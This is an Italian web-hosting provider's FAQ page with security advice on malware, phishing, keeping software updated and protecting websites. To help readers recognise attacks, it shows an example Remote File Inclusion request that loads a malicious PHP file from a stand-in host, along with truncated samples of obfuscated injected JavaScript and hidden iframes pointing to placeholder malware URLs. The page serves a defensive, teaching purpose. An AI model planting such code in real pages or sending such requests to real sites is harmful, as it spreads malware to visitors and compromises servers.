Informazioni commerciali +39 0575 05077
  Assistenza telefonica +39 0575 0505
Hosting > Hosting Windows > FAQ > FAQ - Consigli di sicurezza contro virus e malware

5.4 FAQ - Consigli di sicurezza contro virus e malware

Consigli pratici e suggerimenti utili per difendere il proprio Pc dagli attacchi esterni, come virus, Malware, Phishing e Keyloggers.
Per garantire la sicurezza del proprio Pc è opportuno seguire alcune pratiche di sicurezza:
Pratiche di sicurezza generiche Pratiche di sicurezza specifiche per malware
  1. Tenere aggiornato il sistema operativo. Spesso i Malware cercano di sfruttare vecchie vulnerabilità note ed è per questo che gli aggiornamenti regolari possono aiutare molto.
  2. Tenere aggiornato il software, in particolare il browser (Internet Explorer, Firefox, etc) ed altri programmi comuni quali Adobe Acrobat Reader. Anche questi software presentano spesso vulnerabilità note delle vecchie versioni e rappresentano un facile ingresso se non aggiornati.
  3. Tenere aggiornato il proprio antivirus e lanciare periodicamente una scansione completa, possibilmente anche con più di un software perché purtroppo non sempre un singolo software è in grado di rilevare tutti i tipi di Malware in circolazione. Per scegliere il programma da utilizzare sono disponibili alcuni siti che effettuano analisi comparative, tra cui https://www.av-comparatives.org su cui vengono periodicamente pubblicati dei test.
  4. Tenere sempre attivo un firewall a protezione della connessione internet. Meglio ancora se un firewall evoluto che mostra notifiche ogni volta che un programma presente nel PC tenta di inviare dati su internet (le password raccolte devono essere prima o poi inviate all'attaccante). Per scegliere il Firewall da utilizzare sono disponibili alcuni siti che effettuano analisi comparative, tra cui http://www.matousec.com/projects/proactive-security-challenge-64/
  5. Cambiare le proprie password ogni 3 mesi al massimo, per tutti i propri servizi, non solo Aruba.
  1. Non lanciare allegati eseguibili ricevuti tramite posta elettronica, neanche se provengono da mittenti conosciuti (che potrebbero avere il PC compromesso).
  2. Non cliccare sui link sospetti ricevuti tramite social network (facebook, twitter, etc) o tramite instant messaging. In particolare quelli che invitano a scaricare accattivanti e utili software per tenere sotto controllo i propri amici o funzioni del genere.
  3. Non fornire mai i propri dati di accesso rispondendo a messaggi email che li richiedono per via di fantomatici aggiornamenti di database o perdita sul server o blocco del conto. È quasi impossibile che un fornitore di servizi richieda ai propri clienti la password, meno ancora via email.
  4. Non scaricare e non eseguire software contraffatto o crack di software originale: anche se apparentemente funzionanti, questi software includono quasi sempre un virus o Malware o trojan horse al loro interno e spesso vengono messi in circolazione proprio per questo.
  5. Non salvare sul proprio PC password e dati di accesso e non utilizzare le funzioni ricorda password. Digitare la password ogni volta è più scomodo, ma molto più sicuro: il Malware esegue infatti una scansione sul PC dove molti software (ad esempio Filezilla) salvano una copia più o meno protetta dei dati di accesso memorizzati.
  6. Usare sempre i protocolli sicuri messi a disposizione da Aruba, come https, smtps, pop3s, imaps, ftps (collegamento alla spunta specifica dell'articolo su Pubblicazione FTP). In questo modo i dati di accesso transiteranno su internet non in chiaro, ma protetti dalla crittografia: anche se intercettati risulteranno illeggibili.
  7. Controllare il codice della propria Home Page: uno dei metodi di diffusione del Malware prevede l'utilizzo dei dati di accesso FTP raccolti sui PC infetti per compromettere i siti web relativi e tramite essi far scaricare il Malware stesso a tutti i visitatori. Questo in genere viene fatto inserendo del codice Javascript offuscato all'interno della HomePage del sito: la pagina mantiene il proprio aspetto e funzionamento, ma a ogni apertura tenterà di far scaricare al visitatore file infetti provenienti da altri siti ancora, reindirizzando sempre il browser di un generico visitatore sulla pagina esterna richiamata dal codice.
Per non incorrere in problemi di sicurezza sulle pagine del proprio sito è necessario mantenere in sicurezza le applicazioni web pubblicate. È infatti possibile che pagine il cui codice non sia scritto in modo sicuro siano vulnerabili a vari tipi di attacchi, quali XSS o SQL injection. Questo tipo di vulnerabilità sono indipendenti dalla sicurezza del webserver, in quanto vengono sfruttate con normali richieste HTTP, appositamente formate per utilizzare il codice delle pagine web in modo fraudolento. Le misure da seguire per la sicurezza si differenziano a seconda che si tratti di:
  1. Applicazioni sviluppate da terzi

    Per pubblicare il proprio sito è possibile trovare in rete una moltitudine di applicazioni preconfezionate, scritte in vari linguaggi, e con supporto a diversi tipi di Database. Le tipologie di questi applicativi comprendono forum, ecommerce, webmail, guestbook e molto altro ancora. Tali applicativi possono presentare vulnerabilità di vario genere, per prevenire i possibili attacchi verificare periodicamente la presenza di versioni aggiornate delle applicazioni utilizzate, in genere gli aggiornamenti sono disponibili direttamente dalla Home Page dello sviluppatore. Per essere efficaci gli aggiornamenti vanno ripetuti almeno una volta al mese. Non sempre, però, un'applicazione aggiornata alla sua ultima versione è sicura. Per reperire informazioni sulle vulnerabilità note e su quali versioni di applicativo ne sono affette sono disponibili:  
  2. Applicazioni sviluppate in proprio

    In caso di applicazioni sviluppate in proprio, cercare di realizzarle in modo che non siano vulnerabili perlomeno a RFI (Remote File Inclusion), tecnica che permette di richiamare via Url il contenuto di una pagina differente da quella caricata e visualizzare sensibili informazioni sul contenuto del proprio sito. In genere questo tipo di vulnerabilità viene sfruttato con richieste HTTP simili alla seguente:

    http:// www.nomedominio.com/index.php?agina=http://www.sitomalevolo.com/malware.php ?

    Dove index.php è la propria pagina web contenente la vulnerabilità e malware.php è invece una pagina con codice malevolo pubblicata su un server esterno. Tramite queste richieste viene tentata l'esecuzione del codice malevolo remoto sul server dove risiede il proprio Dominio.

    Evitare SQLInjection (inoculazione di query sql indesiderate) sul proprio database mysql-mssql. Una descrizione di questo tipo di vulnerabilità è disponibile alla pagina: https://it.wikipedia.org/wiki/SQL_injection

    In rete è inoltre possibile trovare numerose guide per la scrittura di codice sicuro nei vari linguaggi di programmazione.
La prima cosa da fare è rimuovere tutto il codice malevolo eventualmente presente nelle pagine web dei propri siti.
 
  • Nel caso si pensi che il proprio PC sia infetto sono disponibili anche numerosi tool per la scansione online del computer, ad esempio tra i più conosciuti esemplifichiamo:
  • Verificare eventuali infezioni presenti nel proprio computer. Nel caso in cui per la pubblicazione del sito ci si avvalga di collaboratori e/o webmaster, verificare l'integrità di tutti i computer utilizzati. È sufficiente che uno solo di questi sia vulnerabile o infetto per subire il furto delle credenziali di accesso.
  • Verificare se sono disponibili aggiornamenti per le applicazioni web utilizzate. Spesso, infatti, queste presentano vulnerabilità nelle vecchie versioni e rappresentano quindi un facile ingresso se non aggiornate.
  • Ripulire i PC infetti tramite antivirus ed antiMalware, e attivare le opportune protezioni per evitare il ripetersi di simili problemi.
  • Dopo aver messo in sicurezza ogni computer utilizzato, procedere con il cambio di tutte le credenziali di accesso utilizzate in precedenza. Anche se non ci è possibile dare indicazioni sicure sui dati di accesso di servizi non gestiti da Aruba (home banking, social network etc...) è assolutamente consigliabile cambiare anche tali dati, rivolgendosi eventualmente ai rispettivi fornitori del servizio.
Per Windows e Linux Antivirus e Firewall:
Per chi utilizza sistemi Windows, Linux e Unix
Di seguito alcuni esempi di codice che, attraverso applicazioni web vulnerabili o furto delle proprie credenziali di accesso al sito, può essere inserito nelle pagine web del proprio sito:
 
<script>function v47e ...etc... 4950543E'));</script>
<iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
<script language="javascript">$= ...etc... ;eval(unescape($));document.write($);</script>
<!-- ~ -->
<div style="visibility:hidden">
<iframe src="http://url_contenente_malware" width=100 height=80></iframe>
</div>
<!-- ~ -->
In genere questi codici hanno una o più delle seguenti caratteristiche:
  1. Proprietà "visibility: hidden" per risultare non visibili nella normale navigazione del sito.
  2. Utilizzano una codifica per nascondere il loro contenuto durante la lettura della pagina sorgente.
  3. Richiamano pagine esterne ai Server Aruba, generalmente pagine che risiedono su server compromessi e contenenti malware.
Tra le applicazioni potenzialmente più vulnerabili e spesso utilizzate per provocare danni sui siti che si basano su di esse, si individuano:
  • Sistemi cms e portali
    Tutti i *nuke e derivati - phpnuke, postnuke, sfm, invision, aspnuke, wordpress, mambo, joomla, ecc..
  • Guestbook
    web wiz, matt, ecc
  • Forums
    phpbb, invision, vbulletin, snitz ecc
  • News
    web wiz, moduli per cms, ecc Moduli vari per cms gallery, chat, avatars, upload ecc
  • Free PHP
    ODP Script ipershop, applicazione in asp/vbscript.encode, con database access (iper_ita.mdb), phpODP
Sono inoltre sconsigliati i file di tipo torrent per la condivisione di files con software BitTorrent.
 
 
Quanto è stata utile questa guida?
 

Non hai trovato quello che cerchi?

Contatta i nostri esperti, sono a tua disposizione.